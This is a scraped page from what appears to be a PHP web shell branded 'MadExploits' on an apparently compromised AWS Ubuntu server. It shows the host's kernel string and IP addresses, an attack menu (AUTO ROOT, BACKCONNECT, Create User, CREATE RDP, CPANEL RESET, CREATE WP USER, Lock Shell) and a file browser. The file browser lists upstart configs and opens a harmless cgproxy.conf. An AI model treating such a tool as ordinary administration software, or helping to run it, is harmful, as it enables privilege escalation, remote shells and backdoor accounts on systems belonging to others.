Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.195.19
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
17200 /
etc /
init /
[ HOME SHELL ]
Name
Size
Permission
Action
apparmor.conf
3.62
KB
-rw-r--r--
cgmanager.conf
1.27
KB
-rw-r--r--
cgproxy.conf
956
B
-rw-r--r--
cloud-config.conf
236
B
-rw-r--r--
cloud-final.conf
297
B
-rw-r--r--
cloud-init-blocknet.conf
2.5
KB
-rw-r--r--
cloud-init-container.conf
1.98
KB
-rw-r--r--
cloud-init-local.conf
379
B
-rw-r--r--
cloud-init-nonet.conf
1.86
KB
-rw-r--r--
cloud-init.conf
202
B
-rw-r--r--
cloud-log-shutdown.conf
562
B
-rw-r--r--
console-font.conf
250
B
-rw-r--r--
console-setup.conf
509
B
-rw-r--r--
cron.conf
297
B
-rw-r--r--
dbus.conf
482
B
-rw-r--r--
hostname.conf
284
B
-rw-r--r--
hostname.sh.conf
300
B
-rw-r--r--
hwclock-save.conf
561
B
-rw-r--r--
hwclock.conf
674
B
-rw-r--r--
hwclock.sh.conf
109
B
-rw-r--r--
kmod.conf
689
B
-rw-r--r--
network-interface-container.co...
530
B
-rw-r--r--
network-interface-security.con...
1.71
KB
-rw-r--r--
network-interface.conf
933
B
-rw-r--r--
networking.conf
2.43
KB
-rw-r--r--
passwd.conf
568
B
-rw-r--r--
procps-instance.conf
363
B
-rw-r--r--
procps.conf
119
B
-rw-r--r--
resolvconf.conf
457
B
-rw-r--r--
rfkill-restore.conf
365
B
-rw-r--r--
rfkill-store.conf
357
B
-rw-r--r--
rsyslog.conf
426
B
-rw-r--r--
setvtrgb.conf
230
B
-rw-r--r--
ssh.conf
641
B
-rw-r--r--
ubuntu-fan.conf
239
B
-rw-r--r--
udev.conf
337
B
-rw-r--r--
udevmonitor.conf
360
B
-rw-r--r--
udevtrigger.conf
352
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cgproxy.conf
description "cgroup management proxy" author "Serge Hallyn <serge.hallyn@ubuntu.com>" respawn expect stop emits cgmanager-ready # in trusty /sys/fs/cgroup will be mounted for us. # prior to saucy, we would need to start on mounted # MOUNTPOINT=/sys, and mount /sys/fs/cgroup ourselves start on started cgmanager stop on runlevel [06] # to get debug output into /var/log/upstart/cgproxy.log, create/edit # /etc/default/cgmanager and set cgmanager_opts="--debug" env cgmanager_opts="" env NESTED="no" pre-start script # check whether we should start if [ -e /proc/self/ns/pid ] && [ "$NESTED" = "no" ]; then initctl emit -n cgmanager-ready { stop; exit 0; } fi end script script [ -r /etc/default/cgmanager ] && . /etc/default/cgmanager exec /sbin/cgproxy --sigstop $cgmanager_opts end script post-start script initctl emit -n cgmanager-ready initctl notify-cgroup-manager-address "unix:path=/sys/fs/cgroup/cgmanager/sock" || true end script
Close